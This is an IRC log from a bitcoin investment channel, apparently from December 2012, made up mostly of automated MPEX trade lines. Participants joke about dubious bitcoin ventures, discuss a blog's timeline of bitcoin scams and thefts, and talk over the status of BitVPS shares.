Dec 09 03:26:26 http://betco.in/ Dec 09 03:26:27 lol Dec 09 03:26:28 either way you get the same result 'this stuff is basically only worth something, as long as the community deems it worth something' Dec 09 03:30:51 http://scanlab.name/?lang=eng Dec 09 03:30:53 heh. Dec 09 03:31:01 "o, need as much personal info as possible" Dec 09 03:31:47 pigeons : make a btcjam offering, "Need 1337 BTC to make scanlab.name clone except ours will be much better (can't disclose much of the plan sorry)!" Dec 09 03:31:51 2% a week or w.e Dec 09 03:32:51 lol Dec 09 03:34:48 [MPEX] [S.MPOE] 1970 @ 0.00053117 = 1.0464 BTC [+] Dec 09 03:34:50 [MPEX] [S.MPOE] 19300 @ 0.00053129 = 10.2539 BTC [+] Dec 09 03:34:51 [MPEX] [S.MPOE] 3144 @ 0.00053179 = 1.6719 BTC [+] Dec 09 03:34:52 [MPEX] [S.MPOE] 8627 @ 0.00053248 = 4.5937 BTC [+] Dec 09 03:36:02 ;;seen smickles Dec 09 03:36:02 smickles was last seen in #bitcoin-assets 8 hours, 50 minutes, and 58 seconds ago: yeah, i don't think mp is married because he has too many women to do it legally in his country Dec 09 03:36:12 lololololol Dec 09 03:36:32 that made my life Dec 09 03:39:14 !? Dec 09 03:39:27 lmao what sorcery is this ? Dec 09 03:41:14 burn the witch! Dec 09 04:00:05 [MPEX] [S.MPOE] 10300 @ 0.00053248 = 5.4845 BTC [+] Dec 09 04:02:47 https://bitcointalk.org/index.php?topic=8676.msg128018#msg128018 Dec 09 04:02:56 am i the only one who finds it a little odd that the pic url is Dec 09 04:03:00 http://anonymouse.org/cgi-bin/anon-www.cgi/http://img839.imageshack.us/img839/73/rigsa.jpg Dec 09 04:08:23 even if it's genuine, i'd fear i'll put some beverage on that table and accidentally spill it Dec 09 04:09:25 maybe that's planned, they vanish, taking all bitcoins and say "sorry i have spilled coffee on it" Dec 09 04:12:39 or perhaps "some unspecified bodily fluid" Dec 09 04:13:29 [MPEX] [S.MPOE] 23400 @ 0.00053248 = 12.46 BTC [+] Dec 09 04:23:30 [MPEX] [S.MPOE] 4200 @ 0.00052834 = 2.219 BTC [-] Dec 09 04:23:31 [MPEX] [S.MPOE] 4321 @ 0.00052747 = 2.2792 BTC [-] Dec 09 04:23:33 [MPEX] [S.MPOE] 4321 @ 0.00052738 = 2.2788 BTC [-] Dec 09 04:23:34 [MPEX] [S.MPOE] 1002 @ 0.00052716 = 0.5282 BTC [-] Dec 09 04:24:43 lol Dec 09 04:24:57 "sorry, the mining bond is closed because i got pissed and i pissed on the rig" Dec 09 04:27:39 [MPEX] [S.MPOE] 4321 @ 0.00052736 = 2.2787 BTC [+] Dec 09 04:27:41 [MPEX] [S.MPOE] 20244 @ 0.00052716 = 10.6718 BTC [-] Dec 09 04:31:21 [MPEX] [S.MPOE] 6204 @ 0.00052716 = 3.2705 BTC [-] Dec 09 04:31:22 [MPEX] [S.MPOE] 7396 @ 0.00052654 = 3.8943 BTC [-] Dec 09 04:52:57 [MPEX] [S.MPOE] 4321 @ 0.00053227 = 2.2999 BTC [+] Dec 09 04:52:59 [MPEX] [S.MPOE] 2970 @ 0.00053248 = 1.5815 BTC [+] Dec 09 04:53:00 [MPEX] [S.MPOE] 7109 @ 0.00053271 = 3.787 BTC [+] Dec 09 05:03:55 [MPEX] [S.MPOE] 4321 @ 0.00052871 = 2.2846 BTC [-] Dec 09 05:03:55 [MPEX] [S.MPOE] 2279 @ 0.00052864 = 1.2048 BTC [-] Dec 09 05:04:38 [MPEX] [S.MPOE] 4321 @ 0.00053253 = 2.3011 BTC [+] Dec 09 05:04:39 [MPEX] [S.MPOE] 7276 @ 0.00053271 = 3.876 BTC [+] Dec 09 05:11:34 [MPEX] [O.BTCUSD.C120T] 100 @ 0.2515799 = 25.158 BTC [-] Dec 09 05:15:30 thestringpuller: yo mircea_popescu scorcery is as scorcery does Dec 09 05:15:42 haha Dec 09 05:26:06 [MPEX] [S.MPOE] 4321 @ 0.00053252 = 2.301 BTC [-] Dec 09 05:26:08 [MPEX] [S.MPOE] 4779 @ 0.00053271 = 2.5458 BTC [+] Dec 09 05:31:23 http://trilema.com/2012/the-bitcoin-drama-timeline/ << everyone please review and let me know if i missed anything Dec 09 05:31:38 pigeons smickles kakobreklaaa Namjies and so on! Dec 09 05:31:55 planning to add totals and a graph to it too Dec 09 05:32:59 I stopped reading your blog when it started prompting me for a fee. Dec 09 05:33:29 a Dec 09 05:33:56 Namjies: you get one credit every 7 days, up to 4 or 5, iirc Dec 09 05:34:03 actually you get 5 a week Dec 09 05:34:43 Well fee/registration/etc. Dec 09 05:35:45 mnw doesnt belong there Dec 09 05:35:48 no coins really lost Dec 09 05:35:53 just a fool promisse Dec 09 05:36:35 arguable all of them are that Dec 09 05:36:39 why does glbse belongthen ? Dec 09 05:36:43 dude, mircea_popescu shakaru, i think, got away with 5kbtc and 20kusd Dec 09 05:36:53 o, so more like 10k ? Dec 09 05:36:57 It's not about loss, it's about drama Dec 09 05:37:04 ya, and that's all that's been reported Dec 09 05:37:10 mircea_popescu mnw didnt accept any coin Dec 09 05:37:35 updated Dec 09 05:37:36 i didn't report the fact that he made betwee 300 and 600 btc worth of software sales that he neglected to pay to me Dec 09 05:37:56 kakobreklaaa that's true Dec 09 05:38:01 ill add a note Dec 09 05:38:47 you should add gavin's bitcoin faucet to the linode hack, it was a minicule amount, but it was a 'sentimental' theft Dec 09 05:38:48 added. Dec 09 05:38:55 i have no sentimentsd. Dec 09 05:41:01 [MPEX] [S.MPOE] 4321 @ 0.00053242 = 2.3006 BTC [-] Dec 09 05:41:02 [MPEX] [S.MPOE] 5093 @ 0.00053271 = 2.7131 BTC [+] Dec 09 05:41:03 also i see no reference of 'milk' Dec 09 05:41:03 [MPEX] [S.MPOE] 8536 @ 0.00053276 = 4.5476 BTC [+] Dec 09 05:41:07 but is ok. Dec 09 05:41:11 wow, it feels like the total should be roughly equal to the amount of available btc Dec 09 05:42:35 o, usagi ? Dec 09 05:42:43 hm, has usagi actually embezzled 1k worth ? Dec 09 05:42:50 heck, fuck it, he's worth the mention on the drama alone Dec 09 05:43:06 actually also forgot diablo Dec 09 05:43:42 Don't forget to include Bitcoin itself in that drama list Dec 09 05:44:06 lol Dec 09 05:44:18 and Silk Road. and those US people who had concerns about Bitcoins Dec 09 05:44:44 and pretty much everyone and everything that ever was in the vinicity of anything bitcoin related. Dec 09 05:44:53 Just to be on the safe side. Dec 09 05:44:53 heh, i gave it to the /r/etards Dec 09 05:45:15 silkroad is in there cause of "tony" Dec 09 05:45:16 http://www.reddit.com/r/Bitcoin/comments/14j542/the_bitcoin_drama_timeline/ Dec 09 05:45:37 mircea_popescu: have you figured the total estimate yet? Dec 09 05:45:57 I don't want to hit the '+' key that many times, it'll break Dec 09 05:46:02 From bitcoin-police http://asynclabs.com/contact-us Dec 09 05:46:27 smickles working on it lol. Dec 09 05:46:37 o shit, forgot the bfl ceo thing Dec 09 05:46:56 [MPEX] [S.MPOE] 1700 @ 0.00052871 = 0.8988 BTC [-] Dec 09 05:47:06 Seriously, these people can find a billion thing that's just no findable. How that thing was stumbled on I have no idea. Dec 09 05:49:43 what is it Namjies ? Dec 09 05:54:33 [MPEX] [S.MPOE] 2621 @ 0.00052871 = 1.3857 BTC [-] Dec 09 05:54:34 [MPEX] [S.MPOE] 11171 @ 0.00052864 = 5.9054 BTC [-] Dec 09 05:54:36 [MPEX] [S.MPOE] 9111 @ 0.00052654 = 4.7973 BTC [-] Dec 09 05:59:33 Old website with basically the same logo as ButterflyLabs Dec 09 05:59:47 but called AsyncLabs Dec 09 06:00:07 [MPEX] [S.MPOE] 4321 @ 0.00052666 = 2.2757 BTC [+] Dec 09 06:00:09 [MPEX] [S.MPOE] 12181 @ 0.00052665 = 6.4151 BTC [-] Dec 09 06:00:10 [MPEX] [S.MPOE] 64 @ 0.00052654 = 0.0337 BTC [-] Dec 09 06:00:10 [MPEX] [S.MPOE] 488 @ 0.00052637 = 0.2569 BTC [-] Dec 09 06:00:58 ;;google define valid Dec 09 06:00:58 Valid | Define Valid at Dictionary.com: ; Valid& | Define Valid& at Dictionary.com: ; valid - definition of valid by the Free Online Dictionary, Thesaurus ...: Dec 09 06:01:17 ;;google define point Dec 09 06:01:18 Point | Define Point at Dictionary.com: ; Point - math word definition - Math Open Reference: ; point - definition of point by the Free Online Dictionary, Thesaurus ...: Dec 09 06:01:30 no such thing as a valid point people Dec 09 06:01:34 stop saying that shit Dec 09 06:03:54 ok, muchly updated page. Dec 09 06:04:22 hmmm, interesting stuff Namjies Dec 09 06:04:37 [MPEX] [S.MPOE] 4321 @ 0.00052647 = 2.2749 BTC [+] Dec 09 06:04:38 [MPEX] [S.MPOE] 9879 @ 0.00052637 = 5.2 BTC [-] Dec 09 06:05:29 [MPEX] [S.MPOE] 11550 @ 0.00052637 = 6.0796 BTC [-] Dec 09 06:07:57 [MPEX] [S.MPOE] 4321 @ 0.00053262 = 2.3015 BTC [+] Dec 09 06:07:59 [MPEX] [S.MPOE] 8228 @ 0.00053276 = 4.3835 BTC [+] Dec 09 06:15:21 1.3 mn Dec 09 06:16:47 Scammers own more btc than anyone else Dec 09 06:23:49 [MPEX] [S.MPOE] 4321 @ 0.0005325 = 2.3009 BTC [-] Dec 09 06:38:57 [MPEX] [S.MPOE] 18173 @ 0.00053268 = 9.6804 BTC [+] Dec 09 06:58:45 [MPEX] [S.MPOE] 26006 @ 0.00053268 = 13.8529 BTC [+] Dec 09 06:58:46 [MPEX] [S.MPOE] 8363 @ 0.00052637 = 4.402 BTC [-] Dec 09 06:58:48 [MPEX] [S.MPOE] 14888 @ 0.00052195 = 7.7708 BTC [-] Dec 09 07:03:12 [MPEX] [S.MPOE] 4321 @ 0.00053249 = 2.3009 BTC [+] Dec 09 07:03:13 [MPEX] [S.MPOE] 5986 @ 0.00053276 = 3.1891 BTC [+] Dec 09 07:03:14 [MPEX] [S.MPOE] 11000 @ 0.00053284 = 5.8612 BTC [+] Dec 09 07:03:16 [MPEX] [S.MPOE] 6143 @ 0.00053287 = 3.2734 BTC [+] Dec 09 07:03:17 [MPEX] [S.MPOE] 1731 @ 0.00053294 = 0.9225 BTC [+] Dec 09 07:03:41 e have received questions from publications such as BBC and from Emirates Airlines’ Open Skies magazine. Dec 09 07:03:52 ahahaha ok this is great. the airlines magazine. Dec 09 07:16:03 [MPEX] [S.MPOE] 17518 @ 0.00053055 = 9.2942 BTC [-] Dec 09 07:28:19 [MPEX] [S.MPOE] 4321 @ 0.00052204 = 2.2557 BTC [-] Dec 09 07:28:21 [MPEX] [S.MPOE] 12679 @ 0.00052195 = 6.6178 BTC [-] Dec 09 07:34:07 [MPEX] [S.MPOE] 4321 @ 0.00053052 = 2.2924 BTC [+] Dec 09 07:34:08 [MPEX] [S.MPOE] 20629 @ 0.00053055 = 10.9447 BTC [+] Dec 09 07:37:59 [MPEX] [S.MPOE] 3800 @ 0.00052226 = 1.9846 BTC [-] Dec 09 07:43:04 [MPEX] [O.BTCUSD.P140T] 400 @ 0.21815916 = 87.2637 BTC [-] Dec 09 07:54:25 [MPEX] [S.MPOE] 1196 @ 0.00053055 = 0.6345 BTC [+] Dec 09 07:54:26 [MPEX] [S.MPOE] 938 @ 0.00053294 = 0.4999 BTC [+] Dec 09 07:54:28 [MPEX] [S.MPOE] 1516 @ 0.00053303 = 0.8081 BTC [+] Dec 09 08:01:48 [MPEX] [S.MPOE] 6370 @ 0.00053303 = 3.3954 BTC [+] Dec 09 08:01:50 [MPEX] [S.MPOE] 3830 @ 0.00053304 = 2.0415 BTC [+] Dec 09 08:04:51 [MPEX] [S.MPOE] 521 @ 0.00052226 = 0.2721 BTC [-] Dec 09 08:04:52 [MPEX] [S.MPOE] 5329 @ 0.00052195 = 2.7815 BTC [-] Dec 09 08:36:00 [MPEX] [S.MPOE] 16326 @ 0.00052224 = 8.5261 BTC [+] Dec 09 08:49:51 [MPEX] [S.MPOE] 1823 @ 0.00052195 = 0.9515 BTC [-] Dec 09 08:49:53 [MPEX] [S.MPOE] 16206 @ 0.00052057 = 8.4364 BTC [-] Dec 09 08:49:54 [MPEX] [S.MPOE] 6971 @ 0.00052052 = 3.6285 BTC [-] Dec 09 08:55:03 [MPEX] [S.MPOE] 4321 @ 0.00052062 = 2.2496 BTC [+] Dec 09 08:55:04 [MPEX] [S.MPOE] 13279 @ 0.00052056 = 6.9125 BTC [-] Dec 09 08:58:25 [MPEX] [S.MPOE] 4321 @ 0.00052069 = 2.2499 BTC [+] Dec 09 08:58:27 [MPEX] [S.MPOE] 10221 @ 0.00052056 = 5.3206 BTC [-] Dec 09 08:58:28 [MPEX] [S.MPOE] 19958 @ 0.00052052 = 10.3885 BTC [-] Dec 09 09:05:03 [MPEX] [S.MPOE] 7652 @ 0.00052052 = 3.983 BTC [-] Dec 09 09:05:04 [MPEX] [S.MPOE] 8124 @ 0.00052049 = 4.2285 BTC [-] Dec 09 09:08:53 [MPEX] [S.MPOE] 4321 @ 0.00052209 = 2.256 BTC [+] Dec 09 09:08:55 [MPEX] [S.MPOE] 5979 @ 0.00052224 = 3.1225 BTC [+] Dec 09 09:16:33 [MPEX] [S.MPOE] 4321 @ 0.0005207 = 2.2499 BTC [-] Dec 09 09:16:34 [MPEX] [S.MPOE] 5779 @ 0.00052049 = 3.0079 BTC [-] Dec 09 09:29:54 [MPEX] [S.MPOE] 12600 @ 0.00052049 = 6.5582 BTC [-] Dec 09 09:48:34 anyone see nam lately? Dec 09 09:49:41 [MPEX] [S.MPOE] 4237 @ 0.00052049 = 2.2053 BTC [-] Dec 09 09:49:43 [MPEX] [S.MPOE] 18863 @ 0.00052043 = 9.8169 BTC [-] Dec 09 09:55:44 [MPEX] [S.MPOE] 4321 @ 0.00052192 = 2.2552 BTC [+] Dec 09 09:55:46 [MPEX] [S.MPOE] 8152 @ 0.00052224 = 4.2573 BTC [+] Dec 09 09:55:47 [MPEX] [S.MPOE] 3127 @ 0.00052259 = 1.6341 BTC [+] Dec 09 09:56:55 [MPEX] [O.BTCUSD.C130T] 175 @ 0.20324472 = 35.5678 BTC [-] Dec 09 10:13:34 [MPEX] [S.MPOE] 4321 @ 0.00052258 = 2.2581 BTC [-] Dec 09 10:13:35 [MPEX] [S.MPOE] 6379 @ 0.00052259 = 3.3336 BTC [+] Dec 09 10:19:17 [MPEX] [S.MPOE] 3826 @ 0.00052259 = 1.9994 BTC [+] Dec 09 10:19:18 [MPEX] [S.MPOE] 18451 @ 0.00052332 = 9.6558 BTC [+] Dec 09 10:19:19 [MPEX] [S.MPOE] 7559 @ 0.00052565 = 3.9734 BTC [+] Dec 09 10:21:36 [MPEX] [S.MPOE] 4100 @ 0.0005255 = 2.1546 BTC [-] Dec 09 10:35:53 [MPEX] [S.MPOE] 8338 @ 0.00052156 = 4.3488 BTC [-] Dec 09 10:35:54 [MPEX] [S.MPOE] 4321 @ 0.00052057 = 2.2494 BTC [-] Dec 09 10:35:56 [MPEX] [S.MPOE] 9959 @ 0.00052043 = 5.183 BTC [-] Dec 09 10:35:56 [MPEX] [S.MPOE] 6982 @ 0.0005203 = 3.6327 BTC [-] Dec 09 11:01:11 ;;later tell davout you know bitcoin-central is popping cert warnings Dec 09 11:01:11 The operation succeeded. Dec 09 11:01:28 [MPEX] [S.MPOE] 221 @ 0.0005255 = 0.1161 BTC [+] Dec 09 11:01:29 [MPEX] [S.MPOE] 7064 @ 0.00052565 = 3.7132 BTC [+] Dec 09 11:22:37 [MPEX] [S.MPOE] 4321 @ 0.00052542 = 2.2703 BTC [-] Dec 09 11:22:38 [MPEX] [S.MPOE] 4927 @ 0.00052565 = 2.5899 BTC [+] Dec 09 11:22:39 [MPEX] [S.MPOE] 6200 @ 0.00052893 = 3.2794 BTC [+] Dec 09 11:37:37 [MPEX] [S.MPOE] 21500 @ 0.00053191 = 11.4361 BTC [+] Dec 09 11:42:54 [MPEX] [S.MPOE] 2835 @ 0.00053119 = 1.5059 BTC [-] Dec 09 11:42:56 [MPEX] [S.MPOE] 12943 @ 0.00052873 = 6.8434 BTC [-] Dec 09 11:47:14 [MPEX] [S.MPOE] 3422 @ 0.00052495 = 1.7964 BTC [-] Dec 09 11:47:16 [MPEX] [S.MPOE] 3950 @ 0.00053191 = 2.101 BTC [+] Dec 09 11:47:16 [MPEX] [S.MPOE] 16078 @ 0.00053304 = 8.5702 BTC [+] Dec 09 11:49:22 [MPEX] [S.MPOE] 4321 @ 0.00052437 = 2.2658 BTC [-] Dec 09 11:49:23 [MPEX] [S.MPOE] 3079 @ 0.00052434 = 1.6144 BTC [-] Dec 09 11:54:22 [MPEX] [S.MPOE] 4321 @ 0.00053299 = 2.303 BTC [+] Dec 09 11:54:24 [MPEX] [S.MPOE] 30092 @ 0.00053304 = 16.0402 BTC [+] Dec 09 11:54:25 [MPEX] [S.MPOE] 15443 @ 0.00053305 = 8.2319 BTC [+] Dec 09 11:55:58 meanwhile back at the ranch http://clientsfromhell.net/post/4931111455/i-want-you-to-go-to-google-images-and-search-for Dec 09 12:02:10 [MPEX] [S.DICE] 180000 @ 0.00339 = 610.2 BTC [+] Dec 09 12:03:45 [MPEX] [S.DICE] 39226 @ 0.00339 = 132.9761 BTC [+] Dec 09 12:04:44 [MPEX] [S.DICE] 294 @ 0.00339 = 0.9967 BTC [+] Dec 09 12:06:36 [MPEX] [O.BTCUSD.C150T] 890 @ 0.13290581 = 118.2862 BTC [+] Dec 09 12:11:13 [MPEX] [S.DICE] 95000 @ 0.00339 = 322.05 BTC [+] Dec 09 12:16:53 [MPEX] [S.DICE] 101750 @ 0.00339 = 344.9325 BTC [+] Dec 09 12:48:03 smickles http://www.reddit.com/r/Bitcoin/comments/14j542/the_bitcoin_drama_timeline/ seems they like it Dec 09 12:51:19 [MPEX] [S.MPOE] 17216 @ 0.00053262 = 9.1696 BTC [-] Dec 09 12:51:21 [MPEX] [S.MPOE] 7034 @ 0.00053305 = 3.7495 BTC [+] Dec 09 12:56:35 [MPEX] [S.MPOE] 8394 @ 0.00053305 = 4.4744 BTC [+] Dec 09 12:56:37 [MPEX] [S.MPOE] 4056 @ 0.00053313 = 2.1624 BTC [+] Dec 09 13:00:09 [MPEX] [S.MPOE] 4321 @ 0.00052857 = 2.284 BTC [-] Dec 09 13:00:10 [MPEX] [S.MPOE] 1979 @ 0.00052845 = 1.0458 BTC [-] Dec 09 13:22:55 [MPEX] [S.MPOE] 4100 @ 0.00053111 = 2.1776 BTC [+] Dec 09 13:26:32 [MPEX] [S.MPOE] 4321 @ 0.0005303 = 2.2914 BTC [-] Dec 09 13:26:32 [MPEX] [S.MPOE] 11915 @ 0.00053023 = 6.3177 BTC [-] Dec 09 13:29:03 [MPEX] [S.MPOE] 16335 @ 0.00053023 = 8.6613 BTC [-] Dec 09 13:29:04 [MPEX] [S.MPOE] 5915 @ 0.00052845 = 3.1258 BTC [-] Dec 09 13:35:43 [MPEX] [S.MPOE] 13600 @ 0.00052845 = 7.1869 BTC [-] Dec 09 13:49:25 [MPEX] [S.MPOE] 1756 @ 0.00052845 = 0.928 BTC [-] Dec 09 13:49:27 [MPEX] [S.MPOE] 21540 @ 0.00052722 = 11.3563 BTC [-] Dec 09 13:49:28 [MPEX] [S.MPOE] 6304 @ 0.00052434 = 3.3054 BTC [-] Dec 09 13:52:37 Do you own PGM shares? Pls vote: https://bitcointalk.org/index.php?topic=78638.60 Dec 09 14:04:54 [MPEX] [S.MPOE] 4321 @ 0.00052455 = 2.2666 BTC [+] Dec 09 14:04:55 [MPEX] [S.MPOE] 8217 @ 0.00052434 = 4.3085 BTC [-] Dec 09 14:04:57 [MPEX] [S.MPOE] 9450 @ 0.00052353 = 4.9474 BTC [-] Dec 09 14:12:46 [MPEX] [S.MPOE] 8500 @ 0.00052083 = 4.4271 BTC [-] Dec 09 14:19:53 [MPEX] [S.MPOE] 7981 @ 0.00052257 = 4.1706 BTC [+] Dec 09 14:30:10 [MPEX] [S.MPOE] 18497 @ 0.00052083 = 9.6338 BTC [-] Dec 09 14:32:47 [MPEX] [S.MPOE] 2850 @ 0.00052083 = 1.4844 BTC [-] Dec 09 14:40:02 [MPEX] [S.MPOE] 3831 @ 0.00052257 = 2.002 BTC [+] Dec 09 14:42:46 [MPEX] [S.MPOE] 221 @ 0.0005291 = 0.1169 BTC [+] Dec 09 14:42:47 [MPEX] [S.MPOE] 5050 @ 0.00052939 = 2.6734 BTC [+] Dec 09 14:43:24 [MPEX] [S.BVPS] [PAID] 500000 @ 0.00013201 = 66.00300001 BTC Dec 09 14:50:10 [MPEX] [S.MPOE] 4321 @ 0.00053085 = 2.2938 BTC [+] Dec 09 14:50:11 [MPEX] [S.MPOE] 14133 @ 0.00053119 = 7.5073 BTC [+] Dec 09 14:50:12 [MPEX] [S.MPOE] 3946 @ 0.00053313 = 2.1037 BTC [+] Dec 09 15:00:45 [MPEX] [S.MPOE] 4321 @ 0.00053289 = 2.3026 BTC [-] Dec 09 15:00:46 [MPEX] [S.MPOE] 1729 @ 0.00053313 = 0.9218 BTC [+] Dec 09 15:22:58 [MPEX] [S.MPOE] 6000 @ 0.00053313 = 3.1988 BTC [+] Dec 09 15:31:44 oh noes http://www.businessinsider.com/catfish-have-learned-how-to-hunt-pigeons-2012-12 Dec 09 15:35:18 [MPEX] [S.MPOE] 4994 @ 0.00053071 = 2.6504 BTC [-] Dec 09 15:35:19 [MPEX] [S.MPOE] 4321 @ 0.00053013 = 2.2907 BTC [-] Dec 09 15:35:21 [MPEX] [S.MPOE] 8029 @ 0.00053003 = 4.2556 BTC [-] Dec 09 15:35:22 [MPEX] [S.MPOE] 1869 @ 0.00052543 = 0.982 BTC [-] Dec 09 16:01:38 [MPEX] [S.MPOE] 4321 @ 0.00052134 = 2.2527 BTC [-] Dec 09 16:01:39 [MPEX] [S.MPOE] 8579 @ 0.00052131 = 4.4723 BTC [-] Dec 09 16:21:21 [MPEX] [S.MPOE] 4321 @ 0.00052144 = 2.2531 BTC [+] Dec 09 16:21:23 [MPEX] [S.MPOE] 12079 @ 0.00052131 = 6.2969 BTC [-] Dec 09 16:31:18 [MPEX] [S.MPOE] 3900 @ 0.00052131 = 2.0331 BTC [-] Dec 09 16:48:58 [MPEX] [S.MPOE] 10754 @ 0.00052131 = 5.6062 BTC [-] Dec 09 16:48:59 [MPEX] [S.MPOE] 3653 @ 0.00052083 = 1.9026 BTC [-] Dec 09 16:49:01 [MPEX] [S.MPOE] 3943 @ 0.0005203 = 2.0515 BTC [-] Dec 09 17:00:51 [MPEX] [S.MPOE] 4321 @ 0.00052181 = 2.2547 BTC [+] Dec 09 17:00:52 [MPEX] [S.MPOE] 5237 @ 0.00052188 = 2.7331 BTC [+] Dec 09 17:12:39 [MPEX] [S.MPOE] 4442 @ 0.00052242 = 2.3206 BTC [+] Dec 09 17:12:41 [MPEX] [S.MPOE] 6025 @ 0.0005203 = 3.1348 BTC [-] Dec 09 17:12:41 [MPEX] [S.MPOE] 18233 @ 0.00052024 = 9.4855 BTC [-] Dec 09 17:17:46 [MPEX] [S.MPOE] 3354 @ 0.00052059 = 1.7461 BTC [+] Dec 09 17:20:52 [MPEX] [S.MPOE] 967 @ 0.00052059 = 0.5034 BTC [+] Dec 09 17:20:53 [MPEX] [S.MPOE] 10917 @ 0.00052024 = 5.6795 BTC [-] Dec 09 17:20:54 [MPEX] [S.MPOE] 15866 @ 0.00051965 = 8.2448 BTC [-] Dec 09 17:23:14 [MPEX] [S.MPOE] 2821 @ 0.00053013 = 1.4955 BTC [+] Dec 09 17:45:34 [MPEX] [S.DICE] 1402 @ 0.0033995 = 4.7661 BTC [+] Dec 09 17:45:36 [MPEX] [S.DICE] 698 @ 0.0034 = 2.3732 BTC [+] Dec 09 17:53:48 [MPEX] [S.MPOE] 17555 @ 0.00051965 = 9.1225 BTC [-] Dec 09 18:05:51 [MPEX] [S.MPOE] 4321 @ 0.00052105 = 2.2515 BTC [+] Dec 09 18:05:52 [MPEX] [S.MPOE] 12050 @ 0.00052139 = 6.2827 BTC [+] Dec 09 18:08:23 [MPEX] [S.MPOE] 1500 @ 0.00053013 = 0.7952 BTC [+] Dec 09 18:08:24 [MPEX] [S.MPOE] 7150 @ 0.00053048 = 3.7929 BTC [+] Dec 09 18:08:26 [MPEX] [S.MPOE] 12100 @ 0.00053313 = 6.4509 BTC [+] Dec 09 18:14:32 [MPEX] [S.MPOE] 4321 @ 0.00053294 = 2.3028 BTC [-] Dec 09 18:14:34 [MPEX] [S.MPOE] 2909 @ 0.00053313 = 1.5509 BTC [+] Dec 09 18:14:34 [MPEX] [S.MPOE] 7684 @ 0.00053315 = 4.0967 BTC [+] Dec 09 18:26:19 [MPEX] [S.MPOE] 4321 @ 0.00052661 = 2.2755 BTC [-] Dec 09 18:26:20 [MPEX] [S.MPOE] 7429 @ 0.00052653 = 3.9116 BTC [-] Dec 09 18:26:20 [MPEX] [S.MPOE] 6000 @ 0.00051965 = 3.1179 BTC [-] Dec 09 18:27:47 [MPEX] [S.MPOE] 4321 @ 0.00053293 = 2.3028 BTC [+] Dec 09 18:27:48 [MPEX] [S.MPOE] 12316 @ 0.00053315 = 6.5663 BTC [+] Dec 09 18:27:50 [MPEX] [S.MPOE] 8613 @ 0.00053316 = 4.5921 BTC [+] Dec 09 18:32:01 [MPEX] [S.MPOE] 17650 @ 0.00053316 = 9.4103 BTC [+] Dec 09 18:46:26 more fun https://bitcointalk.org/index.php?topic=129941.0 Dec 09 18:48:20 [MPEX] [S.MPOE] 4321 @ 0.00051974 = 2.2458 BTC [-] Dec 09 18:48:22 [MPEX] [S.MPOE] 16284 @ 0.00051965 = 8.462 BTC [-] Dec 09 18:48:23 [MPEX] [S.MPOE] 445 @ 0.00051965 = 0.2312 BTC [-] Dec 09 18:48:24 [MPEX] [S.MPOE] 5738 @ 0.00051917 = 2.979 BTC [-] Dec 09 18:48:25 [MPEX] [S.MPOE] 8100 @ 0.00051907 = 4.2045 BTC [-] Dec 09 18:48:27 [MPEX] [S.MPOE] 5862 @ 0.00051869 = 3.0406 BTC [-] Dec 09 18:55:59 ;;bc,stats Dec 09 18:56:01 Current Blocks: 211535 | Current Difficulty: 3438908.9601591 | Next Difficulty At Block: 211679 | Next Difficulty In: 144 blocks | Next Difficulty In About: 1 day, 2 hours, 9 minutes, and 36 seconds | Next Difficulty Estimate: 3378632.47116087 | Estimated Percent Change: -1.75277943373 Dec 09 18:59:22 [MPEX] [S.MPOE] 4321 @ 0.00051902 = 2.2427 BTC [+] Dec 09 18:59:26 [MPEX] [S.MPOE] 4321 @ 0.0005188 = 2.2417 BTC [-] Dec 09 18:59:28 [MPEX] [S.MPOE] 23949 @ 0.00051869 = 12.4221 BTC [-] Dec 09 19:06:49 [MPEX] [S.MPOE] 1047 @ 0.00051869 = 0.5431 BTC [-] Dec 09 19:06:50 [MPEX] [S.MPOE] 5103 @ 0.00051833 = 2.645 BTC [-] Dec 09 19:18:47 mircea_popescu is a "counterstrike-playing-forever-alone-keyboard-hero" Dec 09 19:19:22 source: http://bit.ly/TL9LNh Dec 09 19:20:43 lol, I <3 garziks's comment Dec 09 19:20:50 http://www.reddit.com/r/Bitcoin/comments/14j542/the_bitcoin_drama_timeline/c7dlcra Dec 09 19:45:28 Aye, no one to loan me 100 BTC for BitVPS shares as collateral? Dec 09 19:45:42 hmm Dec 09 19:46:19 has there been any development in the uncertainty with BitVPS? Dec 09 19:46:23 What uncertainty? Dec 09 19:46:44 People just say rg is not much around, as far as I know. Dec 09 19:46:47 well, for a time they weren't fulfilling their shareholder contract obligations Dec 09 19:47:05 rg said he wanted to sell bitvps to his boss Dec 09 19:47:05 they said no Dec 09 19:47:31 also, rg may have said that he doesn't care about bitcoin now that he has a job Dec 09 19:47:44 Ah. Not what I heard. Dec 09 19:48:06 it was quoted to me in a pm Dec 09 19:48:19 (the bit about not caring) Dec 09 19:48:44 the rest of it, and rg not being around much are from my reading of #bitvps Dec 09 19:48:59 also, gruble (iirc) ran off with the paypal account Dec 09 19:49:03 He did say he was working 60+ hours weeks hence why he wasn't around much. But if I leave him a PM he answers me after some time. Dec 09 19:49:21 Namjies: okay so Dec 09 19:49:32 Namjies: refresh my memories Dec 09 19:49:37 when i pm him he doesn't answer :( Dec 09 19:49:41 Namjies: btc-mining is yours, right? Dec 09 19:49:52 Yes Dec 09 19:49:57 Ah Dec 09 19:50:53 ahh what did i miss Dec 09 19:51:32 Namjies: okay so Dec 09 19:51:35 for those who own shares Dec 09 19:51:38 pigeons i was reading that yest. Dec 09 19:51:42 we are fucked, right? Dec 09 19:51:51 dunno what the big deal is, catfish jumped out of water since 4evar. Dec 09 19:52:03 Namjies: I might lend 100btc with MPBOR as colat. Dec 09 19:52:51 Last I heard last week, he had a new provider for servers. (Maybe his boss? Maybe that's the company he works for). He'd keep the BitVPS front and dividends as usual but would rent servers there. He's apparently very happy about it. Lower costs for him, and he gets 24/7 support free from the provider. Plus automatic provision upon payment. Dec 09 19:53:03 good evening Dec 09 19:53:16 ;;seen doffx Dec 09 19:53:22 smickles lol @cbeast. wtf is with people Dec 09 19:53:23 doffx was last seen in #bitcoin-assets 1 week, 2 days, 21 hours, 41 minutes, and 52 seconds ago: That is for sure. Dec 09 19:53:36 He'd keep all the old nodes around the world for current customers. Dec 09 19:53:49 Namjies: answer meeeeeeeeeeeeeeeee Dec 09 19:54:03 I was answering smickles first, sorry. Dec 09 19:54:12 mircea_popescu: sweet, savory comments, that's what's up Dec 09 19:54:30 who is he anyway Dec 09 19:54:33 I'm not sure about BTC-MINING. I have to get a hold of Amazingrando. Dec 09 19:54:48 41 up votes 11 down votes whoa that;s pretty hefty. Dec 09 19:54:55 amazingrando probably like fled to pirate's house in the gayman islands Dec 09 19:55:12 Namjies: it is his boss/company that he works for that is the new provider, 